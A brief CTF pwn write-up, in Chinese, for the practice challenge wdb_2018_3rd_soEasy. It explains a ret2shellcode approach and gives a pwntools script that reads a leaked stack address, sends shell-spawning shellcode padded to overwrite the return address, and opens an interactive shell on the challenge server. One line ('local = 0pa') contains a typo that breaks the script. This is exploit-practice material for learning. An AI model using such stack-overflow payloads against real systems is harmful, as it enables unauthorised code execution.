CTF-pwn:老板,来几道简单pwn
wdb_2018_3rd_soEasy
保护全关
在栈上写入shellcode,然后ret2shellcode
from pwn import *
local = 0pa
binary = "./wdb_2018_3rd_soEasy"
port = "26500"
if local == 1:
p = process(binary)
else:
p = remote("node3.buuoj.cn",port)
def dbg():
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
context(arch = 'i386',os = 'linux')
p.recvuntil('Hei,give you a gift->')
leak_stack = int(p.recv(10),16)
shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(0x48,'a')
payload += p32(0xdeadbeef) + p32(leak_stack)
p.recvuntil('what do you want to do?')
p.send(payload)
# gdb.attach(p)
p.interactive()